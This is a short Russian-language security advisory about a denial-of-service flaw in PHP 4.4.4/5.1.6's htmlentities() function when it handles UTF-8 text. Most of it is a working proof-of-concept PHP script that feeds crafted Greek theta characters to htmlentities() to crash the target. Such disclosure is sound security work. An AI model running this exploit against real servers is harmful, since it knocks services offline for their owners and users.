Программа: PHP 4.4.4/5.1.6
Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. Уязвимость существует из-за ошибки в методе htmlentities() при обработке символов UTF-8. Эксплуатирование уязвимости приведет систему к отказу в обслуживании.
Пример:
<?php
/* Zarathu */
/* www.whitepaperclip.com */
//instantiate a string
$str1 = "";
for($i=0; $i < 64; $i++) {
$str1 .= toUTF(977); //MUST start with 977 before bit-shifting
}
htmlentities($str1, ENT_NOQUOTES, "UTF-8"); //DoS here
/*
htmlentities() method automatically assumes
it is a max of 8 chars. uses greek theta
character bug from UTF-8
*/
?>
<?php
function toUTF($x) {
return chr(($x >> 6) + 192) . chr(($x & 63) + 128);
}
?>